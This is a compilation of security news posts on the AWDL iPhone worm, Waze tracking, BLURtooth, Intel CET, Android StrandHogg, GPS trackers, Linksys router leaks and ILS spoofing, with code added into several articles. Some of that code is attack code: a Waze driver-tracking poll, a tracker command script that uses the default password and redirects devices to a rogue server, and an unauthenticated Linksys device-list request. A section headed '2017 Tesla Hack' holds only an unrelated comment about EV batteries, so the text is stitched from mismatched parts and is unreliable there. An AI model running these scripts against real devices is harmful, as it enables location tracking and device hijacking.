Impressive iPhone Exploit

This is a scarily impressive vulnerability:

Earlier this year, Apple patched one of the most breathtaking iPhone vulnerabilities ever: a memory corruption bug in the iOS kernel that gave attackers remote access to the entire device­ — over Wi-Fi, with no user interaction required at all. Oh, and exploits were wormable­ — meaning radio-proximity exploits could spread from one nearby device to another, once again, with no user interaction needed.

[…]

Beer’s attack worked by exploiting a buffer overflow bug in a driver for AWDL, an Apple-proprietary mesh networking protocol that makes things like Airdrop work. Because drivers reside in the kernel — ­one of the most privileged parts of any operating system­ — the AWDL flaw had the potential for serious hacks. And because AWDL parses Wi-Fi packets, exploits can be transmitted over the air, with no indication that anything is amiss.

[…]

Beer developed several different exploits. The most advanced one installs an implant that has full access to the user’s personal data, including emails, photos, messages, and passwords and crypto keys stored in the keychain. The attack uses a laptop, a Raspberry Pi, and some off-the-shelf Wi-Fi adapters. It takes about two minutes to install the prototype implant, but Beer said that with more work a better written exploit could deliver it in a “handful of seconds.” Exploits work only on devices that are within Wi-Fi range of the attacker.
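
The root cause Beer describes is a classic one: a kernel parser that trusts a length field taken straight from an attacker-controlled packet. As a minimal sketch of that bug class (written in Python, which cannot itself suffer memory corruption; the real flaw was in Apple's C kernel driver, and the field layout below is hypothetical), a safe type-length-value parser has to validate every length before using it:

```python
import struct

def parse_tlvs(packet: bytes, max_value_len: int = 1024) -> list:
    """Parse a type-length-value stream, rejecting attacker-supplied
    lengths that fall outside the buffer. The vulnerable pattern omits
    the bounds check and copies `length` bytes into a fixed-size buffer."""
    records = []
    offset = 0
    while offset + 3 <= len(packet):
        # Hypothetical layout: 1-byte type, then a 2-byte big-endian length.
        tlv_type, length = struct.unpack_from(">BH", packet, offset)
        offset += 3
        # This is the check whose absence turns a parser into an exploit
        # primitive when the data arrives over the air.
        if length > max_value_len or offset + length > len(packet):
            raise ValueError(f"TLV length {length} out of bounds")
        records.append((tlv_type, packet[offset:offset + length]))
        offset += length
    return records
```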

There is no evidence that this vulnerability was ever used in the wild.

EDITED TO ADD: Slashdot thread.

Tracking Users on Waze

A security researcher discovered a vulnerability in Waze that breaks the anonymity of users:

I found out that I can visit Waze from any web browser at waze.com/livemap, so I decided to check how those driver icons are implemented. What I found is that I can ask the Waze API for data on a location by sending my latitude and longitude coordinates. Besides the essential traffic information, Waze also sends me coordinates of other drivers who are nearby. What caught my eye was that identification numbers (IDs) associated with the icons were not changing over time. I decided to track one driver, and after some time she really appeared in a different place on the same road.
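
The technique amounts to polling a map endpoint and noticing that the per-driver IDs stay stable between requests. A rough sketch of that polling loop follows; the endpoint URL, parameter names, and response fields are assumptions for illustration, not the documented livemap API:

```python
import time
import requests

# Hypothetical endpoint and parameters; the real API shape is not
# reproduced from the researcher's writeup.
LIVEMAP_URL = "https://www.waze.com/live-map/api/georss"

def nearby_driver_ids(lat: float, lon: float, delta: float = 0.02) -> set:
    """Return the set of driver-icon IDs reported inside a bounding box."""
    params = {
        "top": lat + delta, "bottom": lat - delta,
        "left": lon - delta, "right": lon + delta,
    }
    data = requests.get(LIVEMAP_URL, params=params, timeout=10).json()
    return {u["id"] for u in data.get("users", [])}

# The de-anonymization observation: poll twice and intersect. Any ID in
# both snapshots is a driver whose movements can be followed over time.
first = nearby_driver_ids(50.08, 14.43)
time.sleep(60)
second = nearby_driver_ids(50.08, 14.43)
print("persistent IDs:", first & second)
```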

The vulnerability has been fixed. More interesting is that the researcher was able to de-anonymize some of the Waze users, proving yet again that anonymity is hard when we’re all so different.

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

Hacking Apple for Profit

Five researchers hacked Apple's corporate networks — not its products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Hacking a Coffee Maker

As expected, IoT devices are filled with vulnerabilities:

As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord.

[…]

In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — ­and possibly other appliances made by Smarter — ­to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss.

New Bluetooth Vulnerability

There’s a new unpatched Bluetooth vulnerability:

The issue is with a protocol called Cross-Transport Key Derivation (or CTKD, for short). When, say, an iPhone is getting ready to pair up with Bluetooth-powered device, CTKD’s role is to set up two separate authentication keys for that phone: one for a “Bluetooth Low Energy” device, and one for a device using what’s known as the “Basic Rate/Enhanced Data Rate” standard. Different devices require different amounts of data — and battery power — from a phone. Being able to toggle between the standards needed for Bluetooth devices that take a ton of data (like a Chromecast), and those that require a bit less (like a smartwatch) is more efficient. Incidentally, it might also be less secure.

According to the researchers, if a phone supports both of those standards but doesn’t require some sort of authentication or permission on the user’s end, a hackery sort who’s within Bluetooth range can use its CTKD connection to derive its own competing key. With that connection, according to the researchers, this sort of ersatz authentication can also allow bad actors to weaken the encryption that these keys use in the first place — which can open its owner up to more attacks further down the road, or let them perform “man in the middle” style attacks that snoop on unprotected data being sent by the phone’s apps and services.
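
The fix the Bluetooth SIG later recommended boils down to a policy rule: a key derived across transports must never silently replace a stronger or more trusted key. Below is a conceptual sketch of that rule; it illustrates the idea only and does not reproduce the specification's actual data structures or wording:

```python
from dataclasses import dataclass

@dataclass
class TransportKey:
    value: bytes
    strength: int        # effective key strength in bits
    authenticated: bool  # whether pairing involved user confirmation

def ctkd_overwrite_allowed(existing: TransportKey, derived: TransportKey) -> bool:
    """Conceptual policy check, not the Bluetooth spec text: refuse to let
    a cross-transport derived key replace a stronger or authenticated key."""
    if derived.strength < existing.strength:
        return False
    if existing.authenticated and not derived.authenticated:
        return False
    return True

# A vulnerable stack skips this check and always overwrites, letting a
# nearby attacker downgrade a previously authenticated key.
ble_key = TransportKey(b"\x01" * 16, strength=128, authenticated=True)
attacker_key = TransportKey(b"\x02" * 16, strength=56, authenticated=False)
print(ctkd_overwrite_allowed(ble_key, attacker_key))  # False under the fix
```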

Another article:

Patches are not immediately available at the time of writing. The only way to protect against BLURtooth attacks is to control the environment in which Bluetooth devices are paired, in order to prevent man-in-the-middle attacks, or pairings with rogue devices carried out via social engineering (tricking the human operator).

However, patches are expected to be available at some point. When they are, they’ll most likely be integrated as firmware or operating system updates for Bluetooth-capable devices.

The timeline for these updates is, for the moment, unclear, as device vendors and OS makers usually work on different timelines, and some may not prioritize security patches as much as others. The number of vulnerable devices is also unclear and hard to quantify.

Many Bluetooth devices can’t be patched.

Final note: this seems to be another example of simultaneous discovery:

According to the Bluetooth SIG, the BLURtooth attack was discovered independently by two groups of academics from the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University.

2017 Tesla Hack

1&1~=Umm • September 4, 2020 4:25 AM

@Elnac:

“Batteries are made in China/India, so it’s not pollution people see, or think about.”

Elon Musk gets batteries from where?

“From the battery manufacturing to its currently inexistant recycling.”

There is some recycling currently going on in the West. In part it’s from splitting battery packs down, pulling out bad cells, and reusing the good cells. For some reason that is not understood as well as many would hope, the lifetime of lithium cells is very variable, in some cases by as much as 5:1. Which is why it is cost effective for people building their own “PowerWalls” to buy up both used vehicle cells and used computer cells. As for more industrial-style “recycling”, as with most recycling it’s actually ‘market driven’: currently there is no market for the recycled parts with sufficient profit for the usual Asian operations to get involved. But,

“Most electric cars take between 300,000 and 500,000 km to even out their pollution with older diesel/gasoline ones, just because of the enormous initial pollution to produce the lithium, and electronics.”

I think you need to compare like with like. European studies have shown that the average family car takes ~25 years of usage to repay its “manufacturing pollution” offset. Both iron and aluminium require a very large electrical input for the smelting process, so much so in fact that for many years aluminium smelting was only carried out in areas with lots of low-cost electricity produced by hydroelectric generation. The studies of interest were carried out before electronic engine management and its consequent ‘extra pollution’ became prevalent.

The real issue between electric and IC vehicles is actually twofold. Firstly, the inefficiencies of the total drive chain from storage to vehicle movement. Even with the old heavy lead-acid batteries used in “delivery vehicles”, having nearly no mechanical drive chain tipped the balance in favour of electric vehicles. Secondly, though, was and still remains the issue of fueling. An IC-engined vehicle can be ‘charged’ in a matter of minutes, whilst batteries can take hours to sizeable fractions of a day. If you were to try to replace the current fossil fuels with another source of chemical energy, the chances are you would not be allowed to do so due to health, safety, and environmental protection legislation. The ‘Petro-Chem’ industry with regard to vehicle fuels would not be allowed to exist if the legislation in place today had been in place a little over a century ago. Thus the IC engine is not playing on a level playing field and leads a ‘charmed existence’.

But talking about fuel transportation: whilst finding figures on ‘loss’ for the electrical/mains grid is not particularly difficult, finding similar figures for petro-chem / fossil fuels is very difficult as it’s more or less kept ‘hidden’. The reason is that most electrical grid transmission loss is ‘heat’, which, whilst it is the ultimate form of pollution, is nowhere near as dangerous as chemical ‘loss’ directly into the environment; most chemical energy sources are toxic (including those we eat), so just dumping them into the environment is a very bad idea.

But you mention coal etc. used for electricity generation, yet you do not mention the refining process of fossil fuels and the immense pollution issues involved.

We could endlessly bat individual parts of the ‘from sunlight to motion’ chain backwards and forwards, but in most cases that would be like arguing what effect the colour of ‘the lipstick on the pig’ has on the taste of the sausages or the quantity of squeal in the process.

You need to consider the entire chain from ‘sunlight to motion’ and compare them side by side. If you did, you might find that the real joker in the pack is the petro-chem industry from ‘hole in the ground to vehicle storage’ as far as pollution is concerned.

Intel will soon bake anti-malware defenses directly into its CPUs

A mobile PC processor code-named Tiger Lake. It will be the first CPU to offer a security capability known as Control-Flow Enforcement Technology. (Image: Intel)

The history of hacking has largely been a back-and-forth game, with attackers devising a technique to breach a system, defenders constructing a countermeasure that prevents the technique, and hackers devising a new way to bypass system security. On Monday, Intel is announcing its plans to bake a new parry directly into its CPUs that’s designed to thwart software exploits that execute malicious code on vulnerable computers.

Control-Flow Enforcement Technology, or CET, represents a fundamental change in the way processors execute instructions from applications such as Web browsers, email clients, or PDF readers. Jointly developed by Intel and Microsoft, CET is designed to thwart a technique known as return-oriented programming, which hackers use to bypass anti-exploit measures software developers introduced about a decade ago. While Intel first published its implementation of CET in 2016, the company on Monday is saying that its Tiger Lake CPU microarchitecture will be the first to include it.

ROP, as return-oriented programming is usually called, was software exploiters’ response to protections such as Executable Space Protection and address space layout randomization, which made their way into Windows, macOS, and Linux a little less than two decades ago. These defenses were designed to significantly lessen the damage software exploits could inflict by introducing changes to system memory that prevented the execution of malicious code. Even when an exploit successfully targeted a buffer overflow or other vulnerability, it resulted only in a system or application crash, rather than a fatal system compromise.

ROP allowed attackers to regain the high ground. Rather than using malicious code written by the attacker, ROP attacks repurpose functions that benign applications or OS routines have already placed into a region of memory known as the stack. The “return” in ROP refers to the use of the RET instruction that’s central to reordering the code flow.

Very effective

Alex Ionescu, a veteran Windows security expert and VP of engineering at security firm CrowdStrike, likes to say that if a benign program is like a building made of Lego bricks that were built in a specific sequence, ROP uses the same Lego pieces but in a different order. In so doing, ROP converts the building into a spaceship. The technique is able to bypass the anti-malware defenses because it uses memory-resident code that’s already permitted to be executed.

CET introduces changes in the CPU that create a new stack called the control stack. This stack can’t be modified by attackers and doesn’t store any data. It stores the return addresses of the Lego bricks that are already in the stack. Because of this, even if an attacker has corrupted a return address in the data stack, the control stack retains the correct return address. The processor can detect this and halt execution.
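
A toy model makes the mechanism concrete. In the sketch below (a conceptual simulation, not Intel's implementation), CALL pushes the return address to both stacks, and RET compares the two copies, raising the equivalent of CET's control-protection (#CP) fault on a mismatch:

```python
class ShadowStackCPU:
    """Toy model of CET shadow stacks: CALL pushes the return address to
    both stacks; RET compares the two copies and faults on a mismatch."""

    def __init__(self):
        self.data_stack = []    # ordinary stack: attacker-corruptible
        self.shadow_stack = []  # control stack: return addresses only

    def call(self, return_addr: int):
        self.data_stack.append(return_addr)
        self.shadow_stack.append(return_addr)

    def ret(self) -> int:
        addr = self.data_stack.pop()
        if addr != self.shadow_stack.pop():
            raise RuntimeError("#CP: control-flow protection fault")
        return addr

cpu = ShadowStackCPU()
cpu.call(0x401000)               # legitimate call site
cpu.data_stack[-1] = 0xDEADBEEF  # ROP-style overwrite of the saved return
try:
    cpu.ret()                    # would have "returned" into a gadget chain
except RuntimeError as fault:
    print(fault)                 # the processor halts execution instead
```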

“Because there is no effective software mitigation against ROP, CET will be very effective at detecting and stopping this class of vulnerability,” Ionescu told me. “Previously, operating systems and security solutions had to guess or infer that ROP had happened, or perform forensic analysis, or detect the second stage payloads/effect of the exploit.”

Not that CET is limited to defenses against ROP. CET provides a host of additional protections, some of which thwart exploitation techniques known as jump-oriented programming and call-oriented programming, to name just two. The ROP defense, however, is among the most interesting aspects of CET.

Those who do not remember the past

Intel has built other security functions into its CPUs with less-than-stellar results. One is Intel’s SGX, short for Software Guard eXtensions, which is supposed to carve out impenetrable chunks of protected memory for security-sensitive functions such as the creation of cryptographic keys. Another security add-on from Intel is known as the Converged Security and Management Engine, or simply the Management Engine. It’s a subsystem inside Intel CPUs and chipsets that implements a host of sensitive functions, among them the firmware-based Trusted Platform Module used for silicon-based encryption, authentication of UEFI BIOS firmware, and Microsoft’s System Guard and BitLocker.

A steady stream of security flaws discovered in both CPU-resident features, however, has made them vulnerable to a variety of attacks over the years. The most recent SGX vulnerabilities were disclosed just last week.

It’s tempting to think that CET will be similarly easy to defeat, or worse, will expose users to hacks that wouldn’t be possible if the protection hadn’t been added. But Joseph Fitzpatrick, a hardware hacker and a researcher at SecuringHardware.com, says he’s optimistic CET will perform better. He explained:

One distinct difference that makes me less skeptical of this type of feature versus something like SGX or ME is that both of those are “adding on” security features, as opposed to hardening existing features. ME basically added a management layer outside the operating system. SGX adds operating modes that theoretically shouldn’t be able to be manipulated by a malicious or compromised operating system. CET merely adds mechanisms to prevent normal operation—returning to addresses off the stack and jumping in and out of the wrong places in code—from completing successfully. Failure of CET to do its job only allows normal operation. It doesn’t grant the attacker access to more capabilities.

Once CET-capable CPUs are available, the protection will work only when the processor is running an operating system with the necessary support. Windows 10 Version 2004 released last month provides that support. Intel still isn’t saying when Tiger Lake CPUs will be released. While the protection could give defenders an important new tool, Ionescu and fellow researcher Yarden Shafir have already devised bypasses for it. Expect them to end up in real-world attacks within the decade.

Google fixes Android flaws that allow code execution with high system rights

Google has shipped security patches for dozens of vulnerabilities in its Android mobile operating system, two of which could allow hackers to remotely execute malicious code with extremely high system rights.

In some cases, the malware could run with highly elevated privileges, a possibility that raises the severity of the bugs. That’s because the bugs, located in the Android System component, could enable a specially crafted transmission to execute arbitrary code within the context of a privileged process. In all, Google released patches for at least 34 security flaws, although some of the vulnerabilities were present only in devices available from manufacturer Qualcomm.

Anyone with a mobile device should check to see if fixes are available for their device. Methods differ by device model, but one common method involves either checking the notification screen or clicking Settings > Security > Security update. Unfortunately, patches aren’t available for many devices.

Two vulnerabilities ranked as critical in Google’s June security bulletin are indexed as CVE-2020-0117 and CVE-2020-8597. They’re among four System flaws located in the Android system (the other two are ranked with a severity of high). The critical vulnerabilities reside in Android versions 8 through the most recent release of 11.

“These vulnerabilities could be exploited through multiple methods such as email, web browsing, and MMS when processing media files,” an advisory from the Department of Homeland Security-funded Multi-State-Information Sharing and Analysis Center said. “Depending on the privileges associated with the application, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Vulnerabilities with a severity rating of high affected the Android media framework, the Android framework, and the Android kernel. Other vulnerabilities were contained in components shipped in devices from Qualcomm. The two Qualcomm-specific critical flaws reside in closed-source components. The severity of the other Qualcomm flaws was rated as high.

Vulnerability in fully patched Android phones under active attack by bank thieves

A vulnerability in millions of fully patched Android phones is being actively exploited by malware that’s designed to drain the bank accounts of infected users, researchers said on Monday.

The vulnerability allows malicious apps to masquerade as legitimate apps that targets have already installed and come to trust, researchers from security firm Promon reported in a post. Running under the guise of trusted apps already installed, the malicious apps can then request permissions to carry out sensitive tasks, such as recording audio or video, taking photos, reading text messages or phishing login credentials. Targets who click yes to the request are then compromised.

Researchers with Lookout, a mobile security provider and a Promon partner, reported last week that they found 36 apps exploiting the spoofing vulnerability. The malicious apps included variants of the BankBot banking trojan. BankBot has been active since 2017, and apps from the malware family have been caught repeatedly infiltrating the Google Play Market.

The vulnerability is most serious in versions 6 through 10, which (according to Statista) account for about 80% of Android phones worldwide. Attacks against those versions allow malicious apps to ask for permissions while posing as legitimate apps. There’s no limit to the permissions these malicious apps can seek. Access to text messages, photos, the microphone, camera, and GPS are some of the permissions that are possible. A user’s only defense is to click “no” to the requests.

An affinity for multitasking

The vulnerability is found in a function known as TaskAffinity, a multitasking feature that allows apps to assume the identity of other apps or tasks running in the multitasking environment. Malicious apps can exploit this functionality by setting the TaskAffinity for one or more of their activities to match the package name of a trusted third-party app. By either combining the spoofed activity with an allowTaskReparenting attribute or launching the malicious activity with an Intent.FLAG_ACTIVITY_NEW_TASK, the malicious apps will be placed inside and on top of the targeted task.

“Thus the malicious activity hijacks the target’s task,” Promon researchers wrote. “The next time the target app is launched from Launcher, the hijacked task will be brought to the front and the malicious activity will be visible. The malicious app then only needs to appear like the target app to successfully launch sophisticated attacks against the user. It is possible to hijack such a task before the target app has even been installed.”

Promon said Google has removed malicious apps from its Play Market, but, so far, the vulnerability appears to be unfixed in all versions of Android. Promon is calling the vulnerability “StrandHogg,” an old Norse term for the Viking tactic of raiding coastal areas to plunder and hold people for ransom. Neither Promon nor Lookout identified the names of the malicious apps. That omission makes it hard for people to know if they are or were infected.

Google representatives didn’t respond to questions about when the flaw will be patched, how many Google Play apps were caught exploiting it, or how many end users were affected. The representatives wrote only:

“We appreciate the researchers[‘] work, and have suspended the potentially harmful apps they identified. Google Play Protect detects and blocks malicious apps, including ones using this technique. Additionally, we’re continuing to investigate in order to improve Google Play Protect’s ability to protect users against similar issues.”

StrandHogg represents the biggest threat to less-experienced users or those who have cognitive or other types of impairments that make it hard to pay close attention to subtle behaviors of apps. Still, there are several things alert users can do to detect malicious apps that attempt to exploit the vulnerability. Suspicious signs include:

  • An app or service that you’re already logged into is asking for a login.
  • Permission popups that don’t contain an app name.
  • Permission requests from an app that shouldn’t need the permissions it asks for. For example, a calculator app asking for GPS permission.
  • Typos and mistakes in the user interface.
  • Buttons and links in the user interface that do nothing when clicked on.
  • The back button does not work as expected.

Tip-off from a Czech bank

Promon researchers said they identified StrandHogg after learning from an unnamed Eastern European security company for financial institutions that several banks in the Czech Republic reported money disappearing from customer accounts. The partner gave Promon a sample of suspected malware. Promon eventually found that the malware was exploiting the vulnerability. Promon partner Lookout later identified the 36 apps exploiting the vulnerability, including BankBot variants.

Monday’s post didn’t say how many financial institutions were targeted in total.

The malware sample Promon analyzed was installed through several dropper apps and downloaders distributed on Google Play. While Google has removed them, it’s not uncommon for new malicious apps to make their way into the Google-operated service. Update: In an email sent after this post went live, a Lookout representative said none of the 36 apps it found was available in Google Play.

Readers are once again reminded to be highly suspicious of Android apps available both in and outside of Google Play. People should also pay close attention to permissions requested by any app.

600,000 GPS trackers for people and pets are using 123456 as a password

Dog plush toy with tracker attached. (Image: Shenzhen i365 Tech)

An estimated 600,000 GPS trackers for monitoring the location of kids, seniors, and pets contain vulnerabilities that open users up to a host of creepy attacks, researchers from security firm Avast have found.

The $25 to $50 devices are small enough to wear on a necklace or stash in a pocket or car dash compartment. Many also include cameras and microphones. They’re marketed on Amazon and other online stores as inexpensive ways to help keep kids, seniors, and pets safe. Ignoring the ethics of attaching a spying device to the people we love, there’s another reason for skepticism. Vulnerabilities in the T8 Mini GPS Tracker Locator and almost 30 similar model brands from the same manufacturer, Shenzhen i365 Tech, make users vulnerable to eavesdropping, spying, and spoofing attacks that falsify users’ true location.

Researchers at Avast Threat Labs found that ID numbers assigned to each device were based on its International Mobile Equipment Identity, or IMEI. Even worse, during manufacturing, devices were assigned precisely the same default password of 123456. The design allowed the researchers to find more than 600,000 devices actively being used in the wild with that password. As if that wasn’t bad enough, the devices transmitted all data in plaintext using commands that were easy to reverse engineer.

The result: people who are on the same network as the smartphone or Web-based app can monitor or modify sensitive traffic. One command that might come in handy sends a text message to a phone of the attacker’s choice. An attacker can use it to obtain the phone number tied to a specific account. From there, attackers on the same network could change the GPS coordinates the tracker was reporting or force the device to call a number of the attacker’s choice and broadcast any sound within range of its microphone. Other commands allowed devices to return to their original factory settings, including the default password, or to install attacker-chosen firmware.

Another command allows attackers to change the IP address of the server that the tracker communicates with. The Avast researchers exploited the weakness to set up a man-in-the-middle attack that allowed them to permanently control the device. From that point on, attackers would no longer need to be connected to the same network as the smartphone or Web app. They would be able to view and modify all plaintext passing through their proxy.
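
Put together, the plaintext protocol and the fixed default password mean the vendor app's commands can be replayed by anyone on the path. The sketch below shows the shape of such an exchange; the host, port, and command grammar are assumptions for illustration, not Avast's published protocol details:

```python
import socket

# Hypothetical values; the real server address, port, and command syntax
# are not reproduced from Avast's research.
TRACKER_HOST = "tracker.example.com"
TRACKER_PORT = 8821
IMEI = "123456789012345"
DEFAULT_PASSWORD = "123456"  # the password shipped on ~600,000 devices

def send_command(keyword: str, *args: str) -> bytes:
    """Send one plaintext command and return the raw reply. Nothing is
    encrypted, and the IMEI plus default password are the only 'auth'."""
    payload = f"[{IMEI},{DEFAULT_PASSWORD},{keyword},{','.join(args)}]"
    with socket.create_connection((TRACKER_HOST, TRACKER_PORT), timeout=10) as s:
        s.sendall(payload.encode("ascii"))
        return s.recv(4096)

# Re-pointing the tracker at a rogue server, as in the man-in-the-middle
# attack described above; later reports then flow through the attacker.
print(send_command("server", "203.0.113.5", "8821"))
```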

A diagram of the man-in-the-middle attack that allowed Avast researchers to divert GPS tracking data through a rogue server. (Image: Avast)

The researchers also determined that all data traveling between the GSM network and the cloud server was not only unencrypted but also unauthenticated. The only thing tying a device to an account was its IMEI. The researchers said they privately notified the vendor of the T8 Mini GPS tracker of the vulnerabilities on June 24 and never got a response. Attempts by Ars to reach company representatives were unsuccessful.

In a blog post scheduled to go live Thursday morning, the Avast researchers identified 29 generic model names of a subset of the 600,000 Internet-connected trackers they found using a default password. They are:

T58
A9
T8S
T28
TQ
A16
A6
3G
A18
A21
T28A
A12
A19
A20
A20S
S1
P1
FA23
A107
RomboGPS
PM01
A21P
PM02
A16X
PM03
WA3
P1-S
S6
S9

GPS trackers can provide protection and peace of mind in the right cases, which at a minimum require fully informed consent of the people being tracked. But the Avast research demonstrates how the capabilities of these devices can cut both ways and make users more vulnerable than if they used no protection at all. People who have bought one of the vulnerable devices should stop using it at once.

>20,000 Linksys routers leak historic record of every device ever connected

This post has been updated to add comments Linksys made online, which say company researchers couldn’t reproduce the information disclosure exploit on routers that installed a patch released in 2014. Representatives of Belkin, the company that acquired Linksys in 2013, didn’t respond to the request for comment that Ars sent on Monday. Ars saw the statement only after this article went live.

More than 20,000 Linksys wireless routers are regularly leaking full historic records of every device that has ever connected to them, including devices’ unique identifiers, names, and the operating systems they use. The data can be used by snoops or hackers in either targeted or opportunistic attacks.

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for the BinaryEdge search engine of Internet-connected devices to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. They were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each of them.
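
Those "few lines of code" look roughly like an unauthenticated JNAP request. The sketch below follows public reporting on CVE-2014-8244; the action name and empty request body are taken from those writeups, so treat the exact details as assumptions:

```python
import requests

def get_device_list(router_ip: str) -> dict:
    """Ask a Linksys Smart Wi-Fi router for its historical device list
    via JNAP; a vulnerable router answers without any authentication."""
    resp = requests.post(
        f"http://{router_ip}/JNAP/",
        headers={"X-JNAP-Action": "http://linksys.com/jnap/devicelist/GetDevices"},
        data="[]",   # empty JNAP request body per public writeups
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()  # MAC addresses, device names, OS fingerprints

# A patched or firewalled router should refuse this WAN-side request or
# time out; a leaking one returns every device it has ever seen.
```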

The flaw allows snoops or hackers to assemble disparate pieces of information that most people assume aren’t public. By combining a historical record of devices that have connected to a public IP address, marketers, abusive spouses, and investigators can track the movements of people they’re interested in. The disclosure can also be useful to hackers. The ShadowHammer group, for instance, recently infected as many as 1 million people after hacking the software update mechanism of computer maker ASUS. The hackers then used a list of about 600 MAC addresses of specific targets that, if infected, would receive advanced stages of the malware.

Got admin?

Besides handing out device information, vulnerable routers also leak whether their default administrative passwords have been changed. The scan Mursch performed earlier this week found about 4,000 of the vulnerable devices were still using the default password. The routers, he said, have remote access enabled by default and can’t be turned off as a workaround, because it’s required for an accompanying Linksys App to function.

That scenario makes it easy for hackers to quickly scan for devices that can be remotely taken over. Hackers can then obtain the Wi-Fi SSID and password in plaintext, change DNS settings to send connected devices to malicious addresses, or carry out a range of other compromises. An attack group known as BlackTech recently used similar router attacks to install the Plead backdoor on targeted computers.

Mursch told Ars that his tests show that devices are vulnerable even when their firewall is turned on. He also said that devices continue to leak even after running a patch Linksys issued in 2014.

Mursch said he disclosed the information leakage publicly after he privately reported it to Linksys officials and they closed the issue after determining it “Not applicable / Won’t fix.” Ars emailed press representatives of Belkin, the company that acquired Linksys in 2013, seeking comment earlier this week and never received a response.

In a statement published Tuesday, one day after Mursch’s post went live, Linksys representatives wrote:

Linksys responded to a vulnerability submission from Bad Packets on May 7th, 2019 regarding a potential sensitive information disclosure flaw: CVE-2014-8244 (which was fixed in 2014). We quickly tested the router models flagged by Bad Packets using the latest publicly available firmware (with default settings) and have not been able to reproduce CVE-2014-8244; meaning that it is not possible for a remote attacker to retrieve sensitive information via this technique. JNAP commands are only accessible to users connected to the router’s local network. We believe that the examples provided by Bad Packets are routers that are either using older versions of firmware or have manually disabled their firewalls. Customers are highly encouraged to update their routers to the latest available firmware and check their router security settings to ensure the firewall is enabled.

As mentioned above, Mursch said the 2014 patch failed to fix the vulnerability on the routers he tested, even when the firewall was turned on. The existence of 20,000 to 25,000 actively leaking routers suggests either that many people have failed to apply the patch or that the patch doesn’t always work.

The list of vulnerable devices released by Mursch is here. (Image: Troy Mursch)

People using one of these devices would do well to test if it is leaking device history to the Internet even after installing the 2014 update. If it is, users should either replace the router with a newer model or replace the Linksys firmware with a third-party offering such as OpenWrt.

The radio navigation planes use to land safely is insecure and can be hacked

A plane in the researchers’ demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway. (Image: Sathaye et al.)

Just about every aircraft that has flown over the past 50 years—whether a single-engine Cessna or a 600-seat jumbo jet—is aided by radios to safely land at airports. These instrument landing systems (ILS) are considered precision approach systems, because unlike GPS and other navigation systems, they provide crucial real-time guidance about both the plane’s horizontal alignment with a runway and its vertical angle of descent. In many settings—particularly during foggy or rainy night-time landings—this radio-based navigation is the primary means for ensuring planes touch down at the start of a runway and on its centerline.

Like many technologies built in earlier decades, the ILS was never designed to be secure from hacking. Radio signals, for instance, aren’t encrypted or authenticated. Instead, pilots simply assume that the tones their radio-based navigation systems receive on a runway’s publicly assigned frequency are legitimate signals broadcast by the airport operator. This lack of security hasn’t been much of a concern over the years, largely because the cost and difficulty of spoofing malicious radio signals made attacks infeasible.

Now, researchers have devised a low-cost hack that raises questions about the security of ILS, which is used at virtually every civilian airport throughout the industrialized world. Using a $600 software-defined radio, the researchers can spoof airport signals in a way that causes a pilot’s navigation instruments to falsely indicate a plane is off course. Normal training calls for the pilot to adjust the plane’s descent rate or alignment accordingly, creating a potential accident as a result.

One attack technique is for spoofed signals to indicate that a plane’s angle of descent is more gradual than it actually is. The spoofed message would generate what is sometimes called a “fly down” signal that instructs the pilot to steepen the angle of descent, possibly causing the aircraft to touch the ground before reaching the start of the runway.
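
The geometry is simple enough to work out directly. With a plain trigonometric model (illustrative numbers, not figures from the paper), even half a degree of spoofed glideslope moves the touchdown point hundreds of feet short:

```python
import math

def distance_to_touchdown(height_ft: float, glide_deg: float) -> float:
    """Horizontal distance to touchdown for a given height above the
    runway and descent angle, from d = h / tan(angle)."""
    return height_ft / math.tan(math.radians(glide_deg))

# A pilot at 300 ft on a true 3.0-degree glideslope, versus one deceived
# by a "fly down" signal into flying a steeper 3.5-degree path.
true_d = distance_to_touchdown(300, 3.0)     # about 5,725 ft remaining
spoofed_d = distance_to_touchdown(300, 3.5)  # about 4,905 ft remaining
print(f"touches down ~{true_d - spoofed_d:.0f} ft short of the aiming point")
```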

The video below shows a different way spoofed signals can pose a threat to a plane that is in its final approach. Attackers can send a signal that causes a pilot’s course deviation indicator to show that a plane is slightly too far to the left of the runway, even when the plane is perfectly aligned. The pilot will react by guiding the plane to the right and will inadvertently steer it past the centerline.

[Video: Wireless Attacks on Aircraft Landing Systems]

The researchers, from Northeastern University in Boston, consulted a pilot and security expert during their work, and all are careful to note that this kind of spoofing isn’t likely to cause a plane to crash in most cases. ILS malfunctions are a known threat to aviation safety, and experienced pilots receive extensive training in how to react to them. A plane that’s misaligned with a runway will be easy for a pilot to visually notice in clear conditions, and the pilot will be able to initiate a missed approach fly-around.

